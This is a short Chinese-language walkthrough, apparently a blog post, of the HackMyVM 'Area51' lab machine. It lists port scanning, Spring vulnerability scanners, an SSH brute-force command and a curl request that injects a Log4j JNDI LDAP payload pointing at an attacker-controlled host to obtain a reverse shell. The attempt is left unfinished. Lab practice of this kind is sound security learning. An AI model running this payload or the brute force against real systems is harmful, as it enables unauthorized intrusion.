前言

为了快速学习相关知识，思路就按照官方的来做一遍，加一些新工具和新的分支思路~

一些奇奇怪怪的靶机就不打了😋

Log4j

编号:Vul-2022-001

名称: Area51

发布日期: 2021-12-24

作者: bit

难度: Medium

靶场状态：开启

网络拓扑：单局域网

IP地址：10.35.0.101

重置周期：每天早10点、晚9点或者宕机重启

时间：2022.1.20-2022.1.31

来源：https://hackmyvm.eu/machines/machine.php?vm=Area51

Writeup：https://mp.weixin.qq.com/s/QRvZUMU_j7TMwP1-mS6aUg

端口

https://github.com/AlphabugX/AScanPort

扫描全端口并识别，评价：速度确实快，适合快速批量，不过没具体服务的版本号

AScanPort.exe -v -h 10.35.0.101 -t 10000 -time 1 -check 2

完美~~ AScanPort.exe -v -h 10.35.0.101 -t 10000 -time 3 -check 5

Spring

8080 spring

先扫描敏感目录，无结果

https://github.com/YanMu2020/SpringScan

扫漏洞，网络好像出问题了，没道理呀，流量是走那个VPN的~~

https://github.com/SummerSec/SpringExploit

SSH

爆破，推荐工具goon，无果

https://github.com/i11us0ry/goon

.goon_win.exe -mode ssh -ip 10.35.0.101 -np -ufile .ssh-user.txt -pfile .ssh-pass.txt

目录

fuzz，推荐ffuf，假装扫下😀

https://github.com/ffuf/ffuf

Log4j

Log4j获取shell

https://github.com/kozmer/log4j-shell-poc

用kali进行反弹shell了，记得把网络模式换成NAT模式，共享物理机IP

下载jdk-8u20-linux-x64.tar.gz，与poc.py同一目录，

curl -H 'X-Api-Version:${jndi:ldap://10.17.14.113:1389/a}' http://10.35.0.101:8080/

额，貌似网络有问题，未完待续🙃

本文版权归作者和微信公众号平台共有，重在学习交流，不以任何盈利为目的，欢迎转载。

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。公众号内容中部分攻防技巧等只允许在目标授权的情况下进行使用，大部分文章来自各大安全社区，个人博客，如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览！！！

敲敲小黑板：《刑法》第二百八十五条　【非法侵入计算机信息系统罪；非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定，侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的，处三年以下有期徒刑或者拘役。违反国家规定，侵入前款规定以外的计算机信息系统或者采用其他技术手段，获取该计算机信息系统中存储、处理或者传输的数据，或者对该计算机信息系统实施非法控制，情节严重的，处三年以下有期徒刑或者拘役，并处或者单处罚金；情节特别严重的，处三年以上七年以下有期徒刑，并处罚金。

原文始发于微信公众号（无问之路）：玩玩PTEHUB